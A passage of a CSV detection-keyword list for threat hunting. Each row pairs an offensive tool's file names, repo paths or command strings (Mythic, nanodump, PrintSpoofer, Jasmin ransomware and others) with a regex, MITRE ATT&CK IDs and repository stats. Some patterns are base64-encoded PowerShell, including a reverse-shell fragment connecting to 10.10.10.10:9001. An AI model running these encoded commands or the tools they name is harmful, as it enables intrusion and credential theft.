T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*irs.exe list*",".{0,1000}irs\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*irs.exe list*",".{0,1000}irs\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*irsl/curlshell*",".{0,1000}irsl\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*irsl/curlshell*",".{0,1000}irsl\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*is_binary_in_gtfobins(*",".{0,1000}is_binary_in_gtfobins\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*is_kirbi_file*",".{0,1000}is_kirbi_file.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*is_proxy_stub_dll_loaded*",".{0,1000}is_proxy_stub_dll_loaded.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*isShellcodeThread*",".{0,1000}isShellcodeThread.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*issue_shell_whoami*",".{0,1000}issue_shell_whoami.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*it will extract domain controller private key through RPC uses it to decrypt all credentials*",".{0,1000}it\swill\sextract\sdomain\scontroller\sprivate\skey\sthrough\sRPC\suses\sit\sto\sdecrypt\sall\scredentials.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*It2H@Qp3Xe*sxdc#KA8)dbMtI5Q7&FK*",".{0,1000}It2H\@Qp3Xe.{0,1000}sxdc\#KA8\)dbMtI5Q7\&FK.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Itay Migdal*",".{0,1000}Itay\sMigdal.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*itaymigdal/LOLSpoof*",".{0,1000}itaymigdal\/LOLSpoof.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*it-gorillaz/lnk2pwn*",".{0,1000}it\-gorillaz\/lnk2pwn.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*itm4n/Perfusion*",".{0,1000}itm4n\/Perfusion.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*itm4n/PPLmedic*",".{0,1000}itm4n\/PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*itm4n/PrivescCheck*",".{0,1000}itm4n\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*itm4nprivesc*",".{0,1000}itm4nprivesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*its-a-feature/Apfell*",".{0,1000}its\-a\-feature\/Apfell.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*itsKindred*",".{0,1000}itsKindred.{0,1000}","offensive_tool_keyword","Github Username","gthub username hosting malware samples and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/itsKindred","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ItsNee/Follina-CVE-2022-30190-POC*",".{0,1000}ItsNee\/Follina\-CVE\-2022\-30190\-POC.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*itunes_backup2john.pl*",".{0,1000}itunes_backup2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*itwasalladream -u * -p * -d *",".{0,1000}itwasalladream\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*itwasalladream*bogus.dll*",".{0,1000}itwasalladream.{0,1000}bogus\.dll.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*ItWasAllADream-master*",".{0,1000}ItWasAllADream\-master.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*IUnknownObj.cpp*",".{0,1000}IUnknownObj\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*IvanGlinkin/AutoSUID*",".{0,1000}IvanGlinkin\/AutoSUID.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*ivre-masscan/*",".{0,1000}ivre\-masscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*Ivy_1*_darwin_amd64*",".{0,1000}Ivy_1.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy_1*_linux_amd64*",".{0,1000}Ivy_1.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy_1*_windows_amd64.exe*",".{0,1000}Ivy_1.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy-main.zip*",".{0,1000}Ivy\-main\.zip.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*iwantmore.pizza/posts/PEzor.html*",".{0,1000}iwantmore\.pizza\/posts\/PEzor\.html.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*iwork2john.py*",".{0,1000}iwork2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*",".{0,1000}JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu*",".{0,1000}JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA*",".{0,1000}JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB*",".{0,1000}JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*jackdaw --*",".{0,1000}jackdaw\s\-\-.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*jackdaw.py*",".{0,1000}jackdaw\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*jackit --reset --debug*",".{0,1000}jackit\s\-\-reset\s\-\-debug.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*jackson5sec/ShimDB*",".{0,1000}jackson5sec\/ShimDB.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*",".{0,1000}jaeles\sscan\s\-s\sbigip\-cve\-2020\-5902\.yaml\s\-U\shttps_url\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*janoglezcampos/rust_syscalls*",".{0,1000}janoglezcampos\/rust_syscalls.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*jas502n/bypassAV*",".{0,1000}jas502n\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*jas502n/CVE-2020-5902*",".{0,1000}jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*Jasmin Decryptor.csproj*",".{0,1000}Jasmin\sDecryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Decryptor.exe*",".{0,1000}Jasmin\sDecryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Decryptor.pdb*",".{0,1000}Jasmin\sDecryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Decryptor.sln*",".{0,1000}Jasmin\sDecryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 